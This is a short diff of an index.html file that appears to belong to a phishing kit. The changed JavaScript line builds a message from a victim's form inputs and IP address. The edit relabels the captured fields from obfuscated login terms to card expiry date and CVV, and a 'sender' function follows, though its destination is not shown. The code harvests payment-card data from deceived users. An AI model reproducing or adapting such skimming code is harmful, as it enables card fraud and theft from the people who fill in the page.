--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
     
         ip = document.getElementById("gfg").innerHTML;
         ip2 = document.getElementById("address").innerHTML;
-        message = "yacayo\n☰URUTcc: " + u_name + "\n☰contraINT: " + u_name2 +  "\n🌎IP: " + ip +"\n" + ip2;
+        message = "yacayo\n☰Fecha: " + u_name + "\n☰cvv: " + u_name2 +  "\n🌎IP: " + ip +"\n" + ip2;
       };
       var sender = function() {
         ready();
